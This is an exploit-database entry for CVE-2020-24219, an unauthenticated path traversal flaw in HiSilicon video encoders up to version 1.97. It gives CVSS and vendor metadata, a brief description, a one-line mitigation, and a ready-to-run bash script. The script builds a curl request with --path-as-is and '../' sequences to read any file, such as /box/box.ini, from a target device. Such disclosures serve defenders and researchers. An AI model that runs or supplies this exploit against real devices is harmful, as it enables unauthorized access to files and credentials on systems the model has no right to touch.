HiSilicon video encoders - unauthenticated file disclosure via path traversal

vendor:

HiSilicon video encoders

by:

Alexei Kojenov

7.5

CVSS

HIGH

Path Traversal

CWE

Product Name: HiSilicon video encoders

Affected Version From: 1.97

Affected Version To: 1.97

Patch Exists: YES

Related CWE: CVE-2020-24219

CPE: //a:hisilicon_video_encoders:hisilicon_video_encoders

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

HiSilicon video encoders – unauthenticated file disclosure via path traversal

This exploit allows an unauthenticated attacker to read arbitrary files on the vulnerable HiSilicon video encoders. The vulnerability is caused by a path traversal issue in the web server, which allows an attacker to access files outside of the web root directory. The vulnerability affects versions up to 1.97 of the HiSilicon video encoders.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.

Source

Exploit-DB raw data:

#!/usr/bin/env bash

# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: https://www.szuray.com/
# Software Link: N/A
# Version: up to 1.97
# Tested on: Linux
# CVE: CVE-2020-24219
# Vendors: URayTech
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979


if [ "$#" -ne 2 ]
then
  echo "Usage:   $0 <server>[:<port>] <filepath>"
  echo "Example: $0 1.2.3.4:8086 /box/box.ini"
  exit 1
fi

curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
  || echo "ERROR: curl returned $?"